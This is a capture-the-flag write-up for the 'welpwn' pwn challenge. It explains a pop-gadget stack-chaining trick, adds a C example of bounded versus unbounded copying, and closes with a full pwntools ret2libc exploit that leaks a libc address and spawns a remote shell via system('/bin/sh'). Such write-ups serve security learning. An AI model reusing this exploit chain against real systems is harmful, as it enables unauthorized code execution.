[XCTF adworld (攻防世界) pwn] welpwn
- Challenge URL: https://adworld.xctf.org.cn/
- Challenge:
All I can say is that this challenge is extremely clever, really clever. I came up with a term for the trick: stack chaining (栈连接).
As usual, run checksec first.
Then look at it in IDA: buf cannot be overflowed, and s, because the copy loop is bounded by its condition, can only overflow by a single address.
The clever part is below:
0x20 = 32
So we can feed in 0x20 bytes, that is four 8-byte words, and four pops are enough to clear them.
```
aaaaaaaa     <--- s
aaaaaaaa
aaaaaaaa     <--- echo saved rbp
pop_4_addr   <--- echo return address
aaaaaaaa     <--- buf
aaaaaaaa
aaaaaaaa
pop_4_addr
pop_rdi_addr
write_got
main_addr
```
After the gadget executes, the first four 8-byte words of buf have all been popped off, leaving:
```
pop_rdi_addr <--- ret
write_got
main_addr
```
By the same logic, laying out the stack like this gets a shell:
```
aaaaaaaa     <--- s
aaaaaaaa
aaaaaaaa     <--- echo saved rbp
pop_4_addr   <--- echo return address
aaaaaaaa     <--- buf
aaaaaaaa
aaaaaaaa
pop_4_addr
pop_rdi_addr
bin_sh_addr
system_addr
```
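To show the bug class this writeup relies on from the defender's side, here is an added C example (not the challenge binary's code; the function names, the 16-byte size of s and the sample bytes are assumptions): a copy-until-NUL loop takes its length from the input, so the bytes after the first 0x10 land on the saved rbp and the low bytes of the return address, while a bounded copy stops at sizeof(s)-1.

```c
#include <stddef.h>
#include <string.h>

#define S_SIZE   16     /* assumed size of echo()'s local 's' (0x18 padding minus 8-byte saved rbp) */
#define BUF_SIZE 0x400  /* size of main()'s read buffer as described in the writeup */

/* Constructed sample input in the shape of the writeup's first payload:
 * 0x18 filler bytes, then a little-endian 64-bit value whose upper five
 * bytes are zero (a placeholder text-segment address, not the real gadget). */
size_t build_sample(unsigned char *buf, size_t len) {
    memset(buf, 0, len);
    memset(buf, 'a', 0x18);
    buf[0x18] = 0x9c; buf[0x19] = 0x08; buf[0x1a] = 0x40;  /* low 3 bytes non-zero */
    return 0x18 + 8;
}

/* Length a copy-until-NUL loop would copy: the sender decides when it stops,
 * not sizeof(s). Only the length is computed here; nothing is overwritten. */
size_t echo_unbounded_len(const unsigned char *buf) {
    size_t n = 0;
    while (buf[n] != 0)
        n++;
    return n;
}

/* How many of those bytes land beyond 's', i.e. on saved rbp and return address. */
size_t bytes_past_s_unbounded(const unsigned char *buf) {
    size_t n = echo_unbounded_len(buf);
    return n > S_SIZE ? n - S_SIZE : 0;
}

/* Hardened echo: bounded by the destination size and always NUL-terminated.
 * Returns the number of bytes copied, never more than s_size - 1. */
size_t echo_bounded(char *s, size_t s_size, const unsigned char *buf) {
    size_t n = 0;
    while (n + 1 < s_size && buf[n] != 0) {
        s[n] = (char)buf[n];
        n++;
    }
    s[n] = '\0';
    return n;
}
```

With the sample input the unbounded loop copies 27 bytes (11 past s: 8 onto the saved rbp and 3 onto the return address, which is exactly why the writeup's payload works), while the bounded version copies 15 and stops.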
Exploit (updated to Python 3 pwntools syntax: bytes literals and print()):
```python
from pwn import *
from LibcSearcher import *

#p = process("./pwn")
p = remote("111.200.241.244", 49039)
elf = ELF('./pwn')
#gdb.attach(p, "b *0x0400782")

write_got = elf.got['write']
puts_plt = elf.plt['puts']
pop_4 = 0x40089C      # pop x4 ; ret gadget that skips the 0x20 bytes of buf
pop_rdi = 0x4008A3    # pop rdi ; ret
main_addr = 0x4007CD

p.recvuntil(b'Welcome to RCTF\n')

# Stage 1: overflow s, chain into buf via pop_4, leak write@got with puts, return to main
payload = b'a' * 0x18 + p64(pop_4) + p64(pop_rdi) + p64(write_got) + p64(puts_plt) + p64(main_addr)
p.send(payload)

p.recvuntil(b'\x40')
write_addr = u64(p.recv(6).ljust(8, b'\x00'))
print(hex(write_addr))

# Resolve libc from the leaked write address
libc = LibcSearcher('write', write_addr)
libc_base = write_addr - libc.dump('write')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')

p.recvuntil(b'\n')

# Stage 2: same chain, this time calling system("/bin/sh")
payload = b'a' * 0x18 + p64(pop_4) + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)
p.send(payload)
p.interactive()
```